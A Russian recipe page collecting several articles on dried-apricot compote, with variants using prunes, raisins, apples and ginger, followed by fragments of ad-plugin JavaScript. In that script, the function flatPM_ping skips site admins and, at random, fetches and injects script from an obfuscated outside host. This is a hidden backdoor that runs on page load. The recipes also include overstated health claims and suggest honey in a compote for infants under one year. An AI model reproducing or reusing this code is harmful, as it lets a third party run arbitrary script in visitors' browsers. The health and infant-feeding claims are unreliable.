Компот из кураги

Как сварить компот из кураги в кастрюле – 5 лучших рецептов компота из кураги

Самый насыщенный вкус имеют компоты, сваренные из сухофруктов. И не важно, какую именно фруктовую основу вы используете: изюм, курагу, яблоки или чернослив. Все равно напиток получится очень вкусным и полезным. Сегодня мы предлагаем вам ознакомиться с подборкой рецептов приготовления компота из кураги.

Курага – это сушеные абрикосы. Мы привыкли покупать этот продукт в магазинах, но и домашняя сушка кураги вполне возможна. Если вы решили заготовить сухофрукты из абрикосов самостоятельно, то, чтобы не упустить важных нюансов приготовления, прочитайте материал нашего сайта на эту тему.

Если же заниматься заготовкой кураги нет ни времени, ни желания, то сухофрукты для варки компота можно приобрести практически в любом магазине или на рынке. Однако к выбору сушеных абрикосов нужно отнестись очень ответственно. Чтобы не приобрести обработанные химикатами фрукты, воспользуйтесь нашими советами:

  • Натуральный продукт имеет матовую кожицу. Блестящая шкурка – первый признак того, что курага подверглась химической обработке.
  • Цвет сухофруктов должен быть коричневым. При этом оттенок может быть от светлого до темного.
  • При сдавливании, правильно высушенная курага, не расползается в руках в клейкую массу.

Подробнее о правильном выборе кураги расскажет кандидат сельскохозяйственных наук Александр Куленкамп

Как подготовить курагу к варке компота

Сухофрукты перед готовкой обязательно следует замочить в кипятке на 20-30 минут. Это позволит фруктам стать мягче, лучше будет отходить грязь и, если внешний вид продукта был откорректирован с помощью химикатов, выведет часть вредных веществ.

После замачивания сухофрукты промывают и слегка обсушивают на сите.

Эти правила предварительной подготовки касаются также чернослива и изюма. Если по рецепту предлагается использовать несколько сортов сухофруктов, то замачивать и промывать каждый нужно отдельно друг от друга.

Рецепты компота из кураги в кастрюле

Простой вариант

300 грамм сушеных абрикосов обрабатывают по схеме, описанной выше. В кастрюлю наливают 2,5 литра чистой воды, и доводят ее до кипения. В бурлящую жидкость закладывают сухофрукты и 200 грамм сахара. Следует заметить, что курага довольно сладкая сама по себе, поэтому количество подсластителя в компоте можете отрегулировать под себя.

Варят компот под закрытой крышкой в течение 20 минут после повторного закипания. Снимать пробу с готового напитка нужно не ранее, чем через два часа. За это время компот из кураги приобретет насыщенный цвет и яркий вкус.

С черносливом

Основных ингредиентов два: чернослив (100 грамм) и курага (200 грамм). Сухофрукты подвергают предварительной обработке. После этого их опускают в кипящий сироп, сваренный из 3 литров воды и 250 грамм сахара. Варят фрукты полчаса, убавив огонь после закипания до минимума.

Кастрюлю с готовым напитком укутывают кухонным полотенцем и оставляют на столе до полного остывания. Такой компот не только обогатит организм витаминами, но и улучшит пищеварение.

Кстати, чернослив вполне можно заготовить самостоятельно. Обо всех правилах и способах сушки сливы читайте тут.

С изюмом

Компот из кураги и сушеного винограда отличается особой сладостью, поэтому при варке напитка количество сахара минимизируют. О том, как приготовить домашний изюм, читайте в нашей статье.

На 3 литра воды берут 150 грамм сахарного песка, 200 грамм кураги и 150 грамм изюма. Как только вода с сахаром закипит, опускают распаренные сухофрукты. Компот варят не более 15-20 минут, а затем настаивают в течение часа под крышкой.

Канал «Video Cooking» предлагает к приготовлению компот из кураги, чернослива и изюма

С яблоками в мультиварке

Любая мультиварка отлично варит компоты. Они получаются очень насыщенными по вкусу и аромату. Чтобы приготовить напиток из кураги и яблок, фрукты моют. Курагу (200 грамм) закладывают сразу в чашу мультиварки, а яблоки (3 крупных штуки) предварительно режут на четвертины и освобождают от семенной коробки.

Фрукты засыпают 300 граммами сахара и заливают холодной водой, примерно, 4,5 литра. Вода должна не доходить до края чаши на 5 сантиметров (объем чаши – 5 литров). Программа, на которой варят компот, — «Тушение» или «Суп», время приготовления – 1 час.

После звукового сигнала устройства, о том, что варка завершилась, не открывая крышки, отключают режим «Поддержание температуры». Компот не открывают 3-4 часа, позволяя напитку настояться.

С тыквой

По-настоящему солнечным получается напиток, приготовленный из тыквы и кураги. Овощной мякоти берут 200 грамм, а сушеных абрикосов 300. Тыкву режут кубиками по 2-2,5 сантиметра, и закладывают в кипящий сироп (вода 3 литра + сахар 250 грамм). Варят компот 25 минут под крышкой, убавив огонь после закипания.

Канал «Хозяюшка Ангелина» рекомендует приготовить компот из кураги с клюквой

Как хранить компот

Готовый напиток лучше всего употребить в течение суток после приготовления, но если такой возможности нет, то его переливают в банку и плотно закрывают крышкой. Использовать графин не желательно, так как он не создает условий герметичности. Максимальный срок хранения – 72 часа.

Если вы любите компоты из сухофруктов, то советуем вам к прочтению статьи о компоте из изюма и из фиников.

Как правильно сварить компот из кураги: 4 рецепта

Компот из кураги, рецепт которого можно найти чуть ниже – освежающий и очень полезный напиток. Но самое главное, что приготовить его можно, как летом в разгар сезона абрикосов, из которых не сложно высушить сухофрукты, так и зимой, когда полки магазинов забиты этим продуктом.

Компот из кураги, калорийность которого всего 33-40 калорий на 100 мл напитка позволяет быстро восполнить запасы недостающих в организме витаминов и микроэлементов, наладить водно-солевой баланс, похудеть.

Прямо сейчас мы расскажем, как сварить компот из кураги с сахаром и без сахара, с добавлением других сухофруктов и без них, для грудничков и взрослых людей.

Полезные советы: как подготовить курагу к варке компота

Перед приготовлением компота из кураги, независимо от выбранного рецепта, сухофрукты обязательно нужно заблаговременно подготовить к варке, а для этого следует:

  1. Промыть продукты, выложить их в кастрюлю или глубокую миску, залить на полчаса кипятком. Данная процедура сделает курагу более мягкой, плюс более чистой, что очень важно, если сухофрукты приобретались в магазине.
  2. Через полчаса откинуть сушеный абрикос на дуршлаг, дождаться пока вся жидкость стечет.
  3. Разложить продукты на бумажной полотенце, дать немного просохнуть, все готово можно варить компот.

Внимание! Данные правила идентичны для всех видов сухофруктов, будь то изюм, яблоки, чернослив или груши.

Польза компота из кураги

Польза кураги для организма человека невероятно велика, и это уже давно доказано учеными. Если вы решили варить компот из сухофруктов, курага в этом компоте сохранит 85% имеющейся ценности, а это витамины практически всех групп, микро и макроэлементы, природный сахар. Специалистами доказано, сваренный из засушенных специальным методом ягод абрикоса напиток:

  • • Восстанавливает и повышает иммунитет.
  • • Улучшает зрение.
  • • Благотворно влияет на нервную систему.
  • • Нормализует в организме водный баланс.
  • • Ускоряет обменные процессы, способствуя похудению.
  • • Очищает кишечник от вредных примесей.
  • • Способствует быстрой регенерации отмерших тканей.
  • • Улучшает цвет кожи и общее состояние здоровья человека.
  • • Восстанавливает работу сердца и сердечных мышц.
  • • Повышает активность.
  • • Способствует быстрейшему выходу из депрессивных состояний.

Очень полезен компот из кураги при грудном вскармливании, его не только не нужно исключать из рациона питания кормящей мамочки, но и наоборот следует вводить в него, применяя ежедневно. Этот чудесный напиток благотворно влияет не только на организм женщины в период восстановления после родов, но и на самого малыша, избавляя его от коликов в животике и других кишечных проблем, плюс укрепляет иммунитет малыша и улучшает работу маленького сердечка.

Рецепт компота из кураги для ребенка

Этот вариант приготовления самый простой, он прекрасно подойдет, как для обычного здорового человека, так и для ребенка до года. Готовится очень просто в течение 15 минут без добавления сахара.

  • — 1,5 литра воды.
  • — 150 грамм кураги.

Делаем компот для грудничка, рецепт по шагам.

  1. Промываем сухофрукты, запариваем кипятком, процеживаем, выкладываем в кастрюлю.
  2. Заливаем продукты холодной чистой (фильтрованная, дистиллированная) водой, ставим на плиту, варим с момента закипания 10 минут.
  3. Отключаем огонь, накрываем компот крышкой, даем немного настояться.
  4. Остывший напиток вливаем в бутылочку младенца и можно давать ребенку. Так же этот компот можно пить всем членам семьи. При желании в него можно добавить немного натурального меда для придания большей сладости.

На заметку! Если вы готовите угощение для малыша до 6 месяцев, не стоит делать его слишком концентрированным, после варки нужно сразу извлечь курагу из кастрюли. Для детей от 6 месяцев и старше компот можно делать более концентрированным.

Компот с курагой и изюмом

Освежающий полезный напиток. Его можно подать с долькой лимона, листиком мяты, кубиком льда или просто в классическом виде с продуктами, из которых он сделан. Готовить угощение по данному рецепту будем без варки.

Набор продуктов для приготовления:

  • — Вода – 2 л.
  • — Изюм – 180 гр.
  • — Курага – 180 гр.
  • — Лимон или мята для подачи.
  1. — Сухофрукты промываем, обсушиваем, вкладываем в самый обычный термос.
  2. — Кипятим воду, крутым кипятком заливаем продукты, плотно закупориваем, взбалтываем несколько раз, оставляем на ночь в термосе.
  3. — Утром напиток уже готов, его можно прямо с ягодками разливать по чашкам или стаканам, украшать долькой лимончика или небольшим листком мяты и пить.

Полезный совет! Если компот готовится для взрослых, лимон и/или мяту можно добавить только в небольшом количестве в сам термос вместе с курагой и изюмом. При желании можно продукты немного подсластить сахаром или медом.

Если вы желаете проварить продукты, то вместо термоса используйте сотейник или кастрюлю, куда выложите все описанные ингредиенты, накройте крышечкой и варите примерно минут 15-20. Затем дайте жидкости немного остыть, и можно смело подавать напиток гостям, любимым людям, процедив через марлю или вместе с плавающими в компоте ягодками.

Рецепт компота из яблок и кураги

Отличный вариант напитка для беременных и кормящих женщин, спортсменов, подростков и стариков. Мы будем использовать в данном рецепте сушеные дольки яблок, но можно применить и свежие фрукты прямо с дерева, предварительно помыв их и нарезав на части.

  • — Сухофрукты в равном количестве – по стакану.
  • — Сахар на собственный вкус (можно заменить фруктозой или медом).
  • — 2,5 литра очищенной воды.
  • — Для подачи листки мяты и лед.

Как варить компот из кураги и яблочек, рецепт по шагам.

  1. Залейте сушеные фрукты теплой водичкой, дайте им постоять 15 минуток, затем промойте и слейте воду.
  2. Сложите все продукты в кастрюльку, добавьте подсластитель (можно вообще не добавлять, в используемых продуктах достаточно сахара), залейте холодной водой.
  3. Отправьте посуду на плиту и на среднем огне с момента вскипания варите 7 минуток.
  4. Накройте ингредиенты крышкой, оставьте до полного или частичного остывания, все готово!
  5. Перед подачей в компот можно добавить кубик льда и мяту. Использовать данный рецепт можно в любую погоду в любой сезон года, независимо от этого ягоды сушеного абрикоса не теряют своей пользы.

Не получилось приготовить блюдо? Не стесняйся, спроси меня персонально.Перейти

Рецепт компота из кураги и чернослива

Тонизирующий с легкой кислинкой, приятного цвета напиток, который прекрасно утолит жажду после интенсивной тренировки, плодотворной работы или просто в знойную жару. Вдобавок к этому такой компот содержит в себе большое количество витаминов и будет полезен для любого организма.

Готовится компот из сушеной кураги и чернослива следующим образом.

  1. Основные ингредиенты, а это чернослив без косточки и курага берем в равном количестве, например, по 150 грамм, обдаем продукты кипятком, сливаем жидкость, отправляем ингредиенты вариться, залив двумя или двумя с половиной литрами водички.
  2. После закипания добавляем в кастрюлю 2-3 ложки сахара, перемешиваем, убавляем огонь до минимума, варим двадцать минут.
  3. Укутываем кастрюльку с компотом теплым пледом или полотенцем, даем около получаса настояться. Можно оставить продукты укутанными до полного остывания.
  4. Подавать напиток можно, как вместе со сваренными сухофруктами, так и предварительно процедив через обычную марлю.

Хранится компот из кураги, рецепт которого мы описали выше, пять суток в холодильнике в закрытой банке или двое суток в комнатной температуре так же в герметично закупоренной стеклянной емкости.

Компот из кураги – лучшие рецепты. Как правильно и вкусно приготовить компот из кураги.

Компот из кураги – общие принципы приготовления

Одна из эпидемий, шагающих по миру – ожирение. Специально спланированная это акция или нет, но людей никто не заражает болезнью, они сами сознательно портят свое здоровье. Одно из оружий массового поражения -это сладкие газированные напитки. Ну, кто же не любит пепси-колу или фанту? Совершенно логичный вопрос «как можно пить колу черного или напиток неестественного оранжевого цвета?» не вызывает интереса, ведь это так «вкусно». Спасти себя и своих родных вы, тем не менее, в состоянии. Совсем не обязательно отказываться от гастрономических удовольствий, ведь можно найти им замену. Конфеты и сладости подменить на фрукты, фаст-фуд на здоровые блюда из нежирной курочки и овощей, а газировку на сваренные в домашних условиях компоты. Особенно вкусным у вас получится компот из кураги. Такой напиток готовить около 15 минут, зато его можно пить целый день. Еще одно его преимущество заключается в том, что варить компот из кураги можно в любое время года, ведь сухофрукты доступны всегда.

Компот из кураги – подготовка продуктов и посуды

Какую курагу нужно приобретать для того, чтобы компот получился вкусным? Так как от этого продукта вам необходима в первую очередь польза, а не эстетические свойства, вы можете приобретать даже самые маленькие и неказистые на вид сухофрукты. Единственное правило – курага должна быть высушена естественным образом, без применения сушильных аппаратов. Именно такой продукт является наиболее полезным. Лучше всего приобретайте сухофрукты на рынке, где вы можете пообщаться с продавцами, и узнать все о продукте.

Рецепты компота из кураги:

Рецепт 1: Компот из кураги

Рецепт является очень простым в приготовлении и займет не более 10-15 минут вашего времени. Вам понадобится курага, чистая вода и сахар. Безусловно, если вы придерживаетесь здорового образа жизни, то можете не класть в напиток сахар – компот из кураги в любом случае будет иметь приятный сладковатый, но не приторный вкус.

  • Курага 300 грамм
  • Сахар по вкусу
  • Вода очищенная 2.5 литра
  1. Курагу необходимо хорошо промыть, можно в теплой воде. После этого каждый отдельный сухофрукт порежьте ножом пополам и опустите в кастрюлю.
  2. Залейте курагу очищенной водой для компота, поместите туда сахар, перемешайте.
  3. Поставьте кастрюлю на плиту. Когда вода закипит, сделайте меньше огонь, накройте крышкой и варите еще около шести-семи минут. После этого охладите компот из кураги и насаждайтесь напитком.

Рецепт 2: Компот из кураги с изюмом

Данный напиток отличается великолепным ансамблем фруктов. Компот из кураги с изюмом получается не только приятным на вкус, но и полезным для вашего иммунитета. Изюм можете использовать недорогой, так как даже неказистые на вид сухофрукты полны такими витаминами.

  • Курага 200 грамм
  • Изюм 200 грамм
  • Сахар по вкусу
  • Вода очищенная 2,5 литра
  1. Курагу и изюм нужно залить теплой водой на десять минут, после чего тщательно промыть сухофрукты под проточной холодной водой.
  2. Выложите сухофрукты в кастрюлю, залейте водой и засыпьте сахаром, перемешайте.
  3. Поставьте кастрюлю на огонь, доведите воду до кипения, после чего варите компот из кураги около пяти минут.

Рецепт 3: Компот из кураги и чернослива

Такой компот получается очень ароматным благодаря тонкой нотке копчения от чернослива.

  • Курага 200 грамм
  • Чернослив 100 грамм
  • Вода очищенная 2.5 литра
  • Сахар по вкусу
  1. Залейте курагу и чернослив на десять минут горячей водой, после чего слейте ее и промойте сухофрукты под проточной водой. Порежьте каждый сухофрукт пополам и сложите в кастрюлю.
  2. Залейте сухофрукты очищенной водой и добавьте сахара, перемешайте.
  3. Поставьте кастрюлю с содержимым на плиту, доведите до кипения, после чего сделайте огонь меньше и варите компот из кураги около пяти-шести минут.

Рецепт 4: Компот из кураги и яблок

Яблоко можете использовать как свежее, так и сухое. В рецепте используются свежие фрукты.

  • Яблоко сладкого сорта 1 штука среднего размера
  • Курага свежая 250 грамм
  • Сахар по вкусу
  • Вода очищенная 2,5 литра
  1. Яблоко помойте и порежьте на маленькие квадраты.
  2. Курагу залейте теплой водой и оставьте на 10 минут. Затем промойте курагу еще раз под холодной водой.
  3. Сложите ингредиенты в кастрюлю, добавьте сахара и залейте водой.
  4. Поставьте кастрюлю на огонь, доведите до кипения и варите затем компот из кураги и яблок около пяти минут.

Рецепт 5: Компот из кураги с имбирем

В местах продажи сухофруктов также продается засахаренный имбирь. Это своеобразное лакомство с «горячим» вкусом, оно исключительно хорошо помогает при простуде и болезнях дыхательных путей. Почему бы не сварить компот из кураги с засахаренным имбирем? Употребляйте напиток как в горячем, так и в холодном виде.

  • Имбирь засахаренный 100 грамм
  • Курага 200 грамм
  • Корица
  • Сахар по вкусу
  • Вода очищенная 2,5 литра
  1. Имбирь порежьте тонкими полосками.
  2. Курагу промойте несколько раз, а затем порежьте каждую штуку пополам.
  3. Сложите ингредиенты в кастрюлю, засыпьте сахаром и залейте водой. Поставьте на огонь.
  4. Когда вода в кастрюле закипит, сделайте меньше огонь, добавьте в кастрюлю немного корицы и накройте крышкой. Через пять минут компот из кураги с имбирем будет готов.

Как правильно варить компоты из кураги?

Компоты из сухофруктов в зимнее время являются важным источником витаминов. И дети, и взрослые любят напитки, приготовленные из кураги — засушенных плодов абрикоса. Продукт имеет приятный сладкий вкус. Чтобы витаминный напиток принес пользу, нужно знать правила приготовления засушенных фруктов. Далее будет рассмотрено несколько рецептов напитков из кураги. Их можно приготовить, добавляя различные ингредиенты: изюм, чернослив, свежие яблоки, мед.

Читать еще:  Клубничный ликер

Как варить компот из кураги по классическому рецепту?

По этому рецепту готовят компот из кураги в детских садах и санаториях. Это очень простое блюдо, его может сварить даже неопытная хозяйка. Нужно взять 250 г сушеного абрикоса и 2 л воды. А также понадобится сахар, его количество берут по вкусу. Нужно учитывать, что сухофрукты имеют сладкий привкус, поэтому сахарный песок нужно добавлять в умеренном количестве, чтобы напиток не получился приторным. Затем можно приступать к приготовлению блюда:

  1. Засушенные абрикосы тщательно промывают под струей воды. Лучше повторить эту процедуру несколько раз.
  2. Затем сухофрукты заливают холодной водой и добавляют сахар.
  3. Кастрюлю с водой и сушеными плодами ставят на плиту, доводят жидкость до кипения и через 5 минут после этого снимают с огня.
  4. Компот остужают и ставят в холодильник.

На приготовление компота из кураги по этому рецепту будет потрачено всего 10 минут. Напиток можно употреблять с печеньем, кексами или сушками.

Компот из кураги можно вводить в рацион малыша, начиная с трехмесячного возраста. Если компот готовится для грудничка, то на 1 л воды нужно взять 100 г кураги, предварительно замочив сухофрукты в воде на 3 — 4 часа. Варить напиток нужно несколько дольше, около 25 минут после закипания. Сахар добавлять не нужно.

Компот из кураги и чернослива

Этот чрезвычайно полезный напиток улучшает состояние сердца и сосудов, а также нормализует давление. Летом он прекрасно утоляет жажду. Для его приготовления понадобится по 200 г чернослива и кураги, 2 литра воды. Сахара нужно взять немного, всего 150 г, так как сушеные фрукты уже имеют сладкий вкус.

Перед приготовлением чернослив и курагу помещают в воду и оставляют на полчаса. Сушеные плоды станут более мягкими и легче разварятся. Если чернослив слишком крупный, то его можно разрезать пополам. Затем приступают к приготовлению компота:

  1. В кастрюлю налить воду. Дождаться закипания жидкости, добавить сахар и варить его до полного растворения.
  2. Положить в сироп чернослив и курагу. Если напиток будут употреблять немедленно, то его варят на маленьком огне 20 — 25 минут. При этом надо следить, чтобы жидкость не закипала.
  3. Если напиток нужно закрутить в банку на зиму, то его необходимо довести до закипания и варить ещё полчаса.

Вкус блюда можно разнообразить, если положить в него немного меда. В этом случае добавлять сахар не нужно. В конце варки в жидкость кладут 100 г меда, и сразу же снимают кастрюлю с плиты, так как такой продукт не подлежит нагреванию. Затем состав перемешивают ложкой и оставляют остывать.

Как сварить компот из кураги и изюма?

Для приготовления напитка понадобится по 200 г изюма и кураги, 2,5 л воды и немного сахарного песка по вкусу. Сухофрукты нужно тщательно промыть, а затем подержать в теплой воде 10 — 15 минут. Только после этого можно приступать к приготовлению напитка:

  1. Изюм и курагу залить водой, положить в состав сахарный песок.
  2. Поставить кастрюлю на плиту и довести жидкость до кипения.
  3. Варить компот из изюма и кураги в течение 5 минут.

Чтобы напиток как можно дольше сохранял полезные свойства нужно соблюдать следующие правила:

  1. Не нужно готовить большое количество блюда. Витамины могут сохраняться только в течение первых 12 часов после приготовления. Далее все полезные вещества разрушаются.
  2. Хранить отвар в холодильнике можно не более 48 часов.
  3. Можно добавить в холодный компот немного лимонного сока, это обогатит отвар витамином С и придаст напитку приятный вкус. Чтобы придать отвару красивый цвет, можно положить в состав при варке несколько штук плодов шиповника.

Компот из кураги и имбиря с корицей

Этот напиток не только приятен на вкус, но и обладает целебными свойствами. Горячий имбирь хорошо помогает при простудных заболеваниях. Нужно взять 100 г имбиря в сахаре, этот ингредиент можно приобрести в магазине, где продают и другие засушенные фрукты. Кроме этого, потребуется 200 г кураги на 2 л воды и немного корицы . Сахарный песок берут по вкусу. Предварительно нужно порезать имбирь и курагу, а затем можно приступить к приготовлению напитка:

  1. Все продукты складывают в кастрюлю и заливают чистой прохладной водой.
  2. Посуду с составом ставят на плиту. Доводят отвар до кипения, добавляют корицу и варят еще 5 минут. При этом кастрюля должна быть прикрыта крышкой.
  3. При простуде напиток лучше употреблять горячим. Это поможет прогреть дыхательные пути.

Как приготовить курагу для компота в домашних условиях?

Найти в продаже курагу совсем нетрудно. Но если необходимо приготовить компот для маленького ребенка, то следует выбирать самые лучшие и безопасные сухофрукты.

Часто в продаже можно встретить яркие сушеные абрикосы. Но несмотря на привлекательный внешний вид, такие сухофрукты лучше не приобретать. Они могут быть обработаны сернистым ангидридом и вызвать аллергию у малыша. Лучше выбирать более тусклые ягоды.

Засушить абрикосы можно в домашних условиях. Это предпочтительнее, если из сухофруктов будет готовиться напиток для детей. Сделать это можно двумя способами:

  1. Вымыть абрикосы и удалить у них косточки. Затем подержать фрукты 10 — 15 минут на водяной бане. Высушить плоды на чистой бумаге и поместить их в духовку на 8 — 10 часов, предварительно разогрев её до +60 градусов. Хранить плоды нужно в деревянной коробочке, но только не из хвойных пород.
  2. Можно подготовить плоды таким же способом, но высушить их на солнце в жаркую погоду, а не в духовом шкафу.

Такие сухофрукты лучше всего подходят для компота, если напиток готовится для маленького ребенка. Плоды, высушенные естественным путем в домашних условиях, никогда не вызовут аллергию.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};